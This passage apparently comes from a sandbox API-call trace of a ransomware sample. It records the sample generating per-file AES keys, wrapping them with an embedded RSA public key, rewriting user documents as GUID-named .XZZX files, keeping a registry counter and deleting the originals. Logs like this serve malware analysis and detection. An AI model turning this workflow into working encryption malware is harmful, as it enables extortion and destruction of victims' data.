LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.304] lstrcpyW (in: lpString1=0x42cf460, lpString2="tKsxqcE.csv" | out: lpString1="tKsxqcE.csv") returned="tKsxqcE.csv" [0043.304] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.304] SetErrorMode (uMode=0x1) returned 0x1 [0043.304] lstrcpyW (in: lpString1=0x42cf860, lpString2="tKsxqcE.csv" | out: lpString1="tKsxqcE.csv") returned="tKsxqcE.csv" [0043.304] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x97377d74, Data2=0xa561, Data3=0x4da4, Data4=([0]=0xae, [1]=0xbb, [2]=0x88, [3]=0xab, [4]=0xc9, [5]=0x32, [6]=0xd9, [7]=0xee))) returned 0x0 [0043.304] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\tKsxqcE.csv") returned 92 [0043.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0043.304] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\0FE24CF432281F2497377D743655036C.XZZX") returned 118 [0043.304] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="XZZX") returned 0x0 [0043.304] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\tKsxqcE.csv", dwFileAttributes=0x20) returned 1 [0043.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\tKsxqcE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\tksxqce.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0043.304] ReadFile (in: hFile=0x4f0, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0xcc89, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x42ce418*=0xcc89, lpOverlapped=0x0) returned 1 [0043.305] CloseHandle (hObject=0x4f0) returned 1 [0043.305] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0043.305] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0043.306] SetErrorMode (uMode=0x1) returned 0x1 [0043.306] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0043.306] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4ed8) returned 1 [0043.308] CryptGenKey (in: hProv=0x42d4ed8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0043.434] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0043.434] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0043.434] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.435] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.435] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0043.435] CryptReleaseContext (hProv=0x42d4ed8, dwFlags=0x0) returned 1 [0043.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\0FE24CF432281F2497377D743655036C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\0fe24cf432281f2497377d743655036c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0043.435] WriteFile (in: hFile=0x4f0, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0xcc89, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x42ce438*=0xcc89, lpOverlapped=0x0) returned 1 [0043.437] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcc89 [0043.437] WriteFile (in: hFile=0x4f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.437] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcc8e [0043.437] WriteFile (in: hFile=0x4f0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x16, lpOverlapped=0x0) returned 1 [0043.437] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcca4 [0043.437] WriteFile (in: hFile=0x4f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.437] SetFilePointer (in: hFile=0x4f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcca9 [0043.437] SetErrorMode (uMode=0x1) returned 0x1 [0043.437] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.437] OutputDebugStringW (lpOutputString="end") [0043.437] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.437] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0043.438] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x42d4ed8) returned 1 [0043.438] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4ed8, dwCertEncodingType=0x1, pInfo=0x3e3f970*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f9a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f9a8*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e5b50) returned 1 [0043.438] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.439] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.439] CryptEncrypt (in: hKey=0x42e5b50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0043.439] CryptEncrypt (in: hKey=0x42e5b50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d4f60*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d4f60*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0043.439] WriteFile (in: hFile=0x4f0, lpBuffer=0x42d4f60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42d4f60*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0043.439] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.439] WriteFile (in: hFile=0x4f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0043.439] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0043.440] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.440] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4e8) returned 0x0 [0043.440] RegQueryValueExW (in: hKey=0x4e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x35, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0043.440] RegCloseKey (hKey=0x4e8) returned 0x0 [0043.440] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4e8) returned 0x0 [0043.440] RegSetValueExW (in: hKey=0x4e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x36, cbData=0x4 | out: lpData=0x42cdfec*=0x36) returned 0x0 [0043.440] RegCloseKey (hKey=0x4e8) returned 0x0 [0043.440] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.440] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.441] CloseHandle (hObject=0x4f0) returned 1 [0043.442] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.443] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.443] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\tKsxqcE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\tksxqce.csv")) returned 1 [0043.444] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\tKsxqcE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\tksxqce.csv")) returned 0 Thread: id = 148 os_tid = 0x900 [0043.599] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.599] lstrcpyW (in: lpString1=0x417f460, lpString2="xlbxUnchVTGwsFtof.doc" | out: lpString1="xlbxUnchVTGwsFtof.doc") returned="xlbxUnchVTGwsFtof.doc" [0043.599] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.599] SetErrorMode (uMode=0x1) returned 0x1 [0043.599] lstrcpyW (in: lpString1=0x417f860, lpString2="xlbxUnchVTGwsFtof.doc" | out: lpString1="xlbxUnchVTGwsFtof.doc") returned="xlbxUnchVTGwsFtof.doc" [0043.599] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xb780c8b6, Data2=0x4bbc, Data3=0x4794, Data4=([0]=0x98, [1]=0x26, [2]=0xc0, [3]=0x91, [4]=0x19, [5]=0x8, [6]=0xe8, [7]=0xd4))) returned 0x0 [0043.599] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\xlbxUnchVTGwsFtof.doc") returned 102 [0043.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0043.599] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned 118 [0043.599] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="XZZX") returned 0x0 [0043.599] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\xlbxUnchVTGwsFtof.doc", dwFileAttributes=0x20) returned 1 [0043.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\xlbxUnchVTGwsFtof.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\xlbxunchvtgwsftof.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0043.600] ReadFile (in: hFile=0x4ec, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x1513f, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x1513f, lpOverlapped=0x0) returned 1 [0043.600] CloseHandle (hObject=0x4ec) returned 1 [0043.601] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0043.601] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0043.601] SetErrorMode (uMode=0x1) returned 0x1 [0043.601] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0043.601] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4fe8) returned 1 [0043.604] CryptGenKey (in: hProv=0x42d4fe8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0043.709] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.709] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.709] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.710] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.710] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0043.710] CryptReleaseContext (hProv=0x42d4fe8, dwFlags=0x0) returned 1 [0043.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\7D60B7A8152CECB0B780C8B61944D0F8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\7d60b7a8152cecb0b780c8b61944d0f8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0043.710] WriteFile (in: hFile=0x4ec, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x1513f, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x1513f, lpOverlapped=0x0) returned 1 [0043.712] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1513f [0043.712] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.712] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15144 [0043.712] WriteFile (in: hFile=0x4ec, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0043.713] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1516e [0043.713] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.713] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15173 [0043.713] SetErrorMode (uMode=0x1) returned 0x1 [0043.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.713] OutputDebugStringW (lpOutputString="end") [0043.713] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.713] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0043.713] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4fe8) returned 1 [0043.714] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4fe8, dwCertEncodingType=0x1, pInfo=0x3e3fa40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fa70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fa78*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5b90) returned 1 [0043.714] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.715] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.715] CryptEncrypt (in: hKey=0x42e5b90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0043.715] CryptEncrypt (in: hKey=0x42e5b90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5070*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5070*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0043.715] WriteFile (in: hFile=0x4ec, lpBuffer=0x42d5070*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5070*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0043.715] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.715] WriteFile (in: hFile=0x4ec, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.715] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0043.715] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.715] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4e4) returned 0x0 [0043.715] RegQueryValueExW (in: hKey=0x4e4, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x36, lpcbData=0x417dfdc*=0x4) returned 0x0 [0043.715] RegCloseKey (hKey=0x4e4) returned 0x0 [0043.715] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4e4) returned 0x0 [0043.716] RegSetValueExW (in: hKey=0x4e4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x37, cbData=0x4 | out: lpData=0x417dfec*=0x37) returned 0x0 [0043.716] RegCloseKey (hKey=0x4e4) returned 0x0 [0043.716] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.716] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.716] CloseHandle (hObject=0x4ec) returned 1 [0043.719] LoadLibraryExW (lpLibFileName="kernel32.dll", 